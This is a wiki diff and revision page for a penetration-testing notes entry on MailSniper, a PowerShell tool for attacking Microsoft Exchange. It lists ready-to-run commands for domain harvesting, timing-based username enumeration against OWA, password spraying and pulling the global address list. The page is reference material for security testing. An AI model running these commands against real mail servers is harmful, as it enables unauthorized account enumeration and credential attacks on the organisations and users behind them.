No edit summary |
|||
(3 intermediate revisions by one other user not shown) | |||
Line 1: | Line 1: | ||
[[Category:Tools]] | [[Category:Tools]] | ||
==<ref>https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/</ref> | ==Description<ref>https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/</ref>== | ||
MailSniper is an open-source reconnaissance and enumeration tool written in PowerShell. It is designed to help security professionals and penetration testers gather information about email accounts and test the security of email systems. MailSniper can be used to perform various tasks such as enumerating email addresses, usernames, and other related information, as well as testing the security of email accounts by attempting to brute force passwords or conducting phishing attacks. | |||
MailSniper is particularly useful for organizations that need to test the security of their email systems. It allows security professionals to identify vulnerabilities and weaknesses in their email infrastructure before they can be exploited by attackers. Additionally, MailSniper is a popular tool among penetration testers and ethical hackers, who use it to test the security of their clients' email systems. | |||
==Commands<ref>https://github.com/dafthack/MailSniper</ref>== | ==Commands<ref>https://github.com/dafthack/MailSniper</ref>== | ||
Line 12: | Line 15: | ||
# Password spray valid usernames with specific password | # Password spray valid usernames with specific password | ||
Invoke-PasswordSprayOWA -ExchHostname mail.name.io -UserList valid.txt -Password P@assword1234 | Invoke-PasswordSprayOWA -ExchHostname mail.name.io -UserList valid.txt -Password P@assword1234 | ||
# Get the global address list with valid credentials | |||
Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName cyberbotic.io\validuser -Password validP@assword1234 -OutFile .\Desktop\results.txt | |||
</syntaxhighlight> | </syntaxhighlight> | ||
==References== | ==References== |
Latest revision as of 13:05, 22 February 2023
Description[1]
MailSniper is an open-source reconnaissance and enumeration tool written in PowerShell. It is designed to help security professionals and penetration testers gather information about email accounts and test the security of email systems. MailSniper can be used to perform various tasks such as enumerating email addresses, usernames, and other related information, as well as testing the security of email accounts by attempting to brute force passwords or conducting phishing attacks.
MailSniper is particularly useful for organizations that need to test the security of their email systems. It allows security professionals to identify vulnerabilities and weaknesses in their email infrastructure before they can be exploited by attackers. Additionally, MailSniper is a popular tool among penetration testers and ethical hackers, who use it to test the security of their clients' email systems.
Commands[2]
# Enumerate Netbios name
Invoke-DomainHarvestOWA -ExchHostname mail.name.com
# Uses timing attack to validate possible usernames with OWA server
Invoke-UsernameHarvestOWA -ExchHostname mail.name.io -Domain name.io -UserList possible.txt -OutFile valid.txt
# Password spray valid usernames with specific password
Invoke-PasswordSprayOWA -ExchHostname mail.name.io -UserList valid.txt -Password P@assword1234
# Get the global address list with valid credentials
Get-GlobalAddressList -ExchHostname mail.cyberbotic.io -UserName cyberbotic.io\validuser -Password validP@assword1234 -OutFile .\Desktop\results.txt